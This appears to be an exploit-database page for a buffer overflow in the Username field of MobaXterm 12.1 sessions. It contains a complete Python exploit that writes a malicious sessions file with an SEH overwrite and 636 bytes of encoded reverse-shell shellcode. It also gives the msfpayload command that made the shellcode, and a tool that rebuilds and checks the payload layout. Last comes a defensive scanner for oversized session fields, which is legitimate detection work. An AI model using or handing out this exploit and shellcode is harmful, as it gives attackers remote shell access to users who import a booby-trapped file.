
Mobatek MobaXterm 12.1 Buffer Overflow

Published: 27 Sep 2019
Reported by: Xavi Beltran
Type: packetstorm (packetstormsecurity.com)

Mobatek MobaXterm 12.1 Buffer Overflow in Username Field

Code

```python
#!/usr/bin/env python3
# Title: Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)
# Author: Xavi Beltran
# Date: 2019-08-31
# Vendor: Mobatek
# Vendor Page: https://mobaxterm.mobatek.net/download.html
# Software Link: https://download.mobatek.net/1112019010310554/MobaXterm_Portable_v11.1.zip
# Exploit Development process: https://xavibel.com/2019/09/01/mobaxterm-buffer-overflow-malicious-sessions-file-import/

# Description:
# SEH-based buffer overflow in the Username field of a valid session.
# This script generates a malicious MobaXterm sessions file (.mxtsessions).
# When the user imports the file and double-clicks the session, the shellcode is executed.
# The POP-POP-RET address below comes from crypt32.dll on Windows XP SP1 (no SafeSEH);
# adapt it, and re-check the bad characters, for the target's Windows version.

# This is the host/port stored in the session, NOT the reverse-shell listener
# (that is LHOST/LPORT in the msfpayload command further down).
# To trigger the overflow the session must point at a real machine with an open
# port that the target machine can reach.
ip_address = "192.168.1.88"
port = "22"

# Recreate a MobaXterm sessions file export
print("[+] Creating the malicious MobaXterm file...")
sessions_file = ""
sessions_file += "[Bookmarks]\n"
sessions_file += "SubRep=\n"
sessions_file += "ImgNum=42\n"
# Session entry: "#icon#type" prefix, then %-separated fields (host, port, username, ...)
sessions_file += "pwnd=#109#0%" + ip_address + "%" + port + "%"

# Here is the SEH-based buffer overflow part

# [*] Exact match at offset 16672 (offset of the SEH handler overwrite)
# Subtract the 4 bytes of nSEH, which sits right before the handler
junk1 = "A" * 16668

# nSEH: we need to jump forward, but 0xEB (JMP SHORT) is a bad char.
# DEC ESP clears ZF (ESP never reaches zero) and does not touch CF, so a
# conditional JA (taken when CF == 0 and ZF == 0) does the job as long as CF is clear.
# The two DEC ESP are undone by the two INC ESP in `alignment` below.
# Trick learned in OSCE. Thank you Muts
nseh = ""
nseh += "\x4C"      # DEC ESP
nseh += "\x4C"      # DEC ESP
nseh += "\x77\x21"  # JA SHORT +0x21 (1035FE59 in the debugger): skips seh (4) + junk2 (29)

# Target is Windows XP SP1, so modules are compiled without SafeSEH
# !mona seh -cp asciiprint
# 0x762C5042 POP-POP-RET in crypt32.dll (little-endian below; all four bytes are printable ASCII)
seh = "\x42\x50\x2C\x76"

# Padding that the JA above jumps over
junk2 = "\x42" * 29

# Restore ESP, undoing the two DEC ESP from nSEH
alignment = ""
alignment += "\x44"  # INC ESP
alignment += "\x44"  # INC ESP

# And we reach our shellcode
# 0xA0 is a bad char, but the Alpha2-encoded shellcode does not contain it
# /usr/share/framework2/msfpayload win32_reverse LHOST=192.168.1.88 LPORT=443 R > reverse_tcp
# /usr/share/framework2/msfencode -e Alpha2 -i reverse_tcp -t perl > encoded_rev_shell
# Shellcode: 636 bytes
shellcode = ""
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x48\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x63"
shellcode += "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32"
shellcode += "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x6b\x4c\x71"
shellcode += "\x7a\x5a\x4b\x30\x4d\x79\x78\x4c\x39\x4b\x4f\x79\x6f\x6b\x4f\x33"
shellcode += "\x50\x6c\x4b\x62\x4c\x56\x44\x77\x54\x6e\x6b\x50\x45\x55\x6c\x6e"
shellcode += "\x6b\x51\x6c\x55\x55\x54\x38\x57\x71\x5a\x4f\x4e\x6b\x52\x6f\x37"
shellcode += "\x68\x6e\x6b\x53\x6f\x51\x30\x36\x61\x38\x6b\x70\x49\x4e\x6b\x70"
shellcode += "\x34\x6e\x6b\x65\x51\x58\x6e\x47\x41\x6f\x30\x6c\x59\x4e\x4c\x4e"
shellcode += "\x64\x6f\x30\x53\x44\x36\x67\x5a\x61\x39\x5a\x64\x4d\x53\x31\x49"
shellcode += "\x52\x4a\x4b\x6b\x44\x67\x4b\x33\x64\x66\x44\x34\x68\x41\x65\x6b"
shellcode += "\x55\x4e\x6b\x73\x6f\x54\x64\x65\x51\x58\x6b\x73\x56\x6e\x6b\x54"
shellcode += "\x4c\x70\x4b\x6e\x6b\x31\x4f\x77\x6c\x33\x31\x48\x6b\x47\x73\x46"
shellcode += "\x4c\x6c\x4b\x6e\x69\x70\x6c\x55\x74\x37\x6c\x73\x51\x6f\x33\x35"
shellcode += "\x61\x4b\x6b\x62\x44\x4e\x6b\x57\x33\x36\x50\x6e\x6b\x41\x50\x76"
shellcode += "\x6c\x6c\x4b\x34\x30\x67\x6c\x4c\x6d\x4c\x4b\x33\x70\x43\x38\x61"
shellcode += "\x4e\x32\x48\x6c\x4e\x62\x6e\x34\x4e\x4a\x4c\x56\x30\x79\x6f\x58"
shellcode += "\x56\x62\x46\x51\x43\x52\x46\x70\x68\x44\x73\x45\x62\x75\x38\x42"
shellcode += "\x57\x32\x53\x75\x62\x31\x4f\x50\x54\x4b\x4f\x78\x50\x72\x48\x68"
shellcode += "\x4b\x5a\x4d\x6b\x4c\x45\x6b\x70\x50\x39\x6f\x6b\x66\x43\x6f\x6e"
shellcode += "\x69\x48\x65\x41\x76\x4f\x71\x48\x6d\x76\x68\x45\x52\x53\x65\x50"
shellcode += "\x6a\x33\x32\x4b\x4f\x6e\x30\x31\x78\x4b\x69\x73\x39\x6c\x35\x6e"
shellcode += "\x4d\x43\x67\x6b\x4f\x6e\x36\x50\x53\x41\x43\x46\x33\x51\x43\x30"
shellcode += "\x43\x36\x33\x57\x33\x42\x73\x49\x6f\x7a\x70\x70\x68\x49\x50\x6d"
shellcode += "\x78\x46\x61\x33\x68\x35\x36\x73\x58\x43\x31\x6d\x6b\x62\x46\x56"
shellcode += "\x33\x4e\x69\x69\x71\x5a\x35\x51\x78\x7a\x4c\x4c\x39\x4e\x4a\x31"
shellcode += "\x70\x36\x37\x49\x6f\x59\x46\x50\x6a\x52\x30\x70\x51\x31\x45\x6b"
shellcode += "\x4f\x5a\x70\x71\x76\x72\x4a\x62\x44\x53\x56\x73\x58\x42\x43\x50"
shellcode += "\x6d\x41\x7a\x32\x70\x42\x79\x51\x39\x38\x4c\x4c\x49\x69\x77\x71"
shellcode += "\x7a\x41\x54\x4c\x49\x6a\x42\x70\x31\x4b\x70\x4b\x43\x6f\x5a\x4d"
shellcode += "\x45\x4e\x69\x69\x6d\x39\x6e\x30\x42\x46\x4d\x59\x6e\x53\x72\x74"
shellcode += "\x6c\x4c\x4d\x73\x4a\x70\x38\x4e\x4b\x4c\x6b\x4e\x4b\x31\x78\x71"
shellcode += "\x62\x6b\x4e\x4e\x53\x76\x76\x79\x6f\x62\x55\x76\x48\x59\x6f\x4e"
shellcode += "\x36\x53\x6b\x70\x57\x71\x42\x53\x61\x66\x31\x32\x71\x72\x4a\x34"
shellcode += "\x41\x56\x31\x73\x61\x70\x55\x53\x61\x59\x6f\x7a\x70\x32\x48\x6c"
shellcode += "\x6d\x38\x59\x73\x35\x58\x4e\x41\x43\x49\x6f\x6a\x76\x43\x5a\x69"
shellcode += "\x6f\x6b\x4f\x30\x37\x59\x6f\x5a\x70\x73\x58\x6b\x57\x42\x59\x78"
shellcode += "\x46\x70\x79\x49\x6f\x73\x45\x64\x44\x59\x6f\x7a\x76\x69\x6f\x43"
shellcode += "\x47\x39\x6c\x39\x6f\x6e\x30\x45\x38\x6a\x50\x4f\x7a\x46\x64\x61"
shellcode += "\x4f\x72\x73\x6b\x4f\x58\x56\x39\x6f\x78\x50\x63"

crash = junk1 + nseh + seh + junk2 + alignment + shellcode

# Keep the rest of the MobaXterm sessions file structure intact
sessions_file += crash
sessions_file += "%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1"

# Write raw bytes: latin-1 maps each "\xNN" in the strings above to exactly one
# byte, so the shellcode is not mangled by UTF-8 encoding or newline translation
with open("pwnd.mxtsessions", "wb") as f:
    f.write(sessions_file.encode("latin-1"))

print("[+] pwnd.mxtsessions file created!")
print("[+] Import the sessions in MobaXterm and wait for the reverse shell! :)")
```
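The exploit above hard-codes every offset. The helper below is an added example, not part of Xavi Beltran's exploit: it rebuilds the same layout from the constants the page gives (SEH overwrite at offset 16672, POP-POP-RET 0x762C5042 from crypt32.dll, 29 bytes of padding) with the JA displacement computed instead of typed in, and then decodes the finished buffer to check what a practitioner verifies before firing it: the handler address sits exactly at the SEH offset in little-endian form and is printable ASCII (the `-cp asciiprint` filter), the JA in nSEH lands on the INC ESP pair, the DEC/INC ESP counts balance, and the shellcode starts right after. The function names and the generic `short_jump` helper are mine.

```python
#!/usr/bin/env python3
"""Rebuild and sanity-check the SEH layout used above (added example, not the original exploit)."""
import struct

# Constants taken from the page
SEH_OFFSET = 16672        # offset of the SEH handler overwrite (mona pattern offset)
POP_POP_RET = 0x762C5042  # POP-POP-RET gadget in crypt32.dll (Windows XP SP1 target)
PADDING = 29              # junk bytes between the handler and the INC ESP pair
DEC_ESP, INC_ESP = 0x4C, 0x44
JA_REL8 = 0x77            # JA rel8: taken when CF == 0 and ZF == 0


def short_jump(opcode, skip):
    """Encode a 2-byte short conditional jump over `skip` bytes (helper name is mine)."""
    if not 0 <= skip <= 0x7F:
        raise ValueError("rel8 forward displacement must be 0..127 bytes")
    return bytes([opcode, skip])


def build_payload(shellcode, seh_offset=SEH_OFFSET, ppr=POP_POP_RET, padding=PADDING):
    """junk1 | nSEH | SEH | junk2 | INC ESP x2 | shellcode, with the jump computed, not hard-coded."""
    junk1 = b"A" * (seh_offset - 4)           # nSEH sits 4 bytes before the handler
    seh = struct.pack("<I", ppr)              # little-endian handler address
    junk2 = b"B" * padding
    # DEC ESP clears ZF (ESP never hits zero) without touching CF, so JA jumps over
    # the handler and the padding; the INC ESPs that follow undo the two DECs
    nseh = bytes([DEC_ESP, DEC_ESP]) + short_jump(JA_REL8, len(seh) + len(junk2))
    alignment = bytes([INC_ESP, INC_ESP])
    return junk1 + nseh + seh + junk2 + alignment + shellcode


def check_layout(payload, shellcode, seh_offset=SEH_OFFSET, ppr=POP_POP_RET):
    """Decode the buffer and return the checks worth doing before sending it to a target."""
    nseh = payload[seh_offset - 4:seh_offset]
    seh = payload[seh_offset:seh_offset + 4]
    # the JA is the last two bytes of nSEH; rel8 is relative to the byte after the jump
    opcode, disp = nseh[2], nseh[3]
    landing = seh_offset + disp
    decs = nseh[:2].count(DEC_ESP)
    incs = payload[landing:landing + decs].count(INC_ESP)
    return {
        "handler_is_ppr": seh == struct.pack("<I", ppr),
        "handler_ascii_printable": all(0x20 <= b < 0x7F for b in seh),
        "jump_is_ja": opcode == JA_REL8,
        "landing": landing,
        "esp_balanced": decs == incs,
        "shellcode_after_landing": payload[landing + decs:] == shellcode,
    }


if __name__ == "__main__":
    sc = bytes.fromhex("eb0359eb05e8f8ffffff")  # first bytes of the page's Alpha2 stub, as a stand-in
    p = build_payload(sc)
    for name, value in check_layout(p, sc).items():
        print(f"{name}: {value}")
    print("nSEH:", p[SEH_OFFSET - 4:SEH_OFFSET].hex(), " SEH:", p[SEH_OFFSET:SEH_OFFSET + 4].hex())
```

Running it reproduces the page's bytes exactly (nSEH `4c4c7721`, SEH `42502c76`) and reports a landing offset of 16705, which is 16672 + 4 + 29, the first INC ESP. Because the displacement is derived from `len(seh) + len(junk2)`, changing the padding or the handler size cannot silently desynchronise the jump, and `short_jump` refuses anything a rel8 cannot express.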

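On the defensive side the same export format can be checked before a sessions file is imported. The scanner below is an added example, not the page's or MobaXterm's code: it splits each bookmark value on `%` the way the export above is laid out and flags fields that are implausibly long or contain non-printable bytes. The field positions (host, port, username after the `#icon#type` prefix) are inferred from the export shown on this page, the 256-byte limit is my assumption about legitimate hostnames and usernames, and the sample file is constructed inline with one normal session and one shaped like the exploit's.

```python
#!/usr/bin/env python3
"""Flag oversized or binary fields in a MobaXterm .mxtsessions export (added example)."""

# Assumption: a legitimate host, port or username field is far shorter than this
MAX_FIELD_LEN = 256
# Field positions after splitting the value on '%', inferred from the export on this page:
# fields[0] is the "#icon#type" prefix, then host, port, username, ...
FIELD_NAMES = {1: "host", 2: "port", 3: "username"}


def parse_sessions(data):
    """Return {session_name: [fields]} for each bookmark line; metadata keys are skipped."""
    sessions = {}
    for line in data.decode("latin-1").splitlines():   # latin-1: one char per byte, never fails
        name, sep, value = line.partition("=")
        if not sep or line.startswith("[") or not value.startswith("#"):
            continue   # section headers and keys such as SubRep= / ImgNum=
        sessions[name] = value.split("%")
    return sessions


def suspicious_fields(fields, max_len=MAX_FIELD_LEN):
    """Findings as (field label, reason, length); an empty list means nothing odd."""
    findings = []
    for idx, field in enumerate(fields):
        label = FIELD_NAMES.get(idx, "field%d" % idx)
        if len(field) > max_len:
            findings.append((label, "oversized", len(field)))
        if any(c < " " or c > "~" for c in field):
            findings.append((label, "non-printable bytes", len(field)))
    return findings


def scan_sessions(data, max_len=MAX_FIELD_LEN):
    """Map session name -> findings, keeping only sessions with at least one finding."""
    result = {}
    for name, fields in parse_sessions(data).items():
        findings = suspicious_fields(fields, max_len)
        if findings:
            result[name] = findings
    return result


# Constructed sample: a normal session and one shaped like the exploit's (16668 'A's,
# the DEC/DEC/JA nSEH, the printable POP-POP-RET, padding, INC/INC and a few stub bytes)
TRAILER = (b"%%-1%-1%%%22%%0%0%0%%%-1%0%0%0%%1080%%0%0%1#MobaFont%10%0%0%0%15%236,236,236"
           b"%30,30,30%180,180,192%0%-1%0%%xterm%-1%-1%_Std_Colors_0_%80%24%0%1%-1%<none>%%0#0# #-1\n")
SAMPLE = (
    b"[Bookmarks]\nSubRep=\nImgNum=42\n"
    b"jumphost=#109#0%10.0.0.5%22%alice" + TRAILER
    + b"pwnd=#109#0%192.168.1.88%22%" + b"A" * 16668
    + b"\x4c\x4c\x77\x21" + b"\x42\x50\x2c\x76" + b"B" * 29 + b"\x44\x44" + b"\xeb\x03\x59"
    + TRAILER
)

if __name__ == "__main__":
    for name, findings in scan_sessions(SAMPLE).items():
        for label, reason, length in findings:
            print(f"{name}: {label} field {reason} ({length} bytes)")
```

On the sample the normal `jumphost` entry is silent and `pwnd` is reported twice for its username field (16710 bytes, and non-printable bytes from the Alpha2 stub). Note that a payload built entirely from printable bytes, which the page's SEH address and nSEH already are, would only trip the length check, so the size bound is the check that matters.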
